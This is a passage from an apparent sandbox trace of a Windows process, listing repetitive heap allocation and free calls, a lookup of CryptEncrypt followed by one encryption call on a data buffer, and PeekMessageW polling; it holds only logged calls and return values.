RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0087.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0087.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69c10 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe243) returned 0x37ce298 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37ce298 | out: hHeap=0x2af0000) returned 1 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f78b8 [0087.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69940 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69940 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0087.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aa9f10 [0087.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9f10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.625] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a78160 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.626] CryptEncrypt (in: hKey=0x9a4280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xe243, dwBufLen=0xe248 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xe248) returned 1 [0087.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0087.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0087.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.629] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0087.629] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 